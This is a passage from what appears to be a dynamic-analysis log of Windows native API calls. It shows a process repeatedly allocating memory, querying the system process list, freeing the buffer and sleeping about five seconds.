BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.697] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.705] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.713] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.721] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.727] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.735] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.743] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.750] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.757] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.765] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.771] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.778] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.787] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.793] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.801] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.808] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.816] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.822] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.829] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 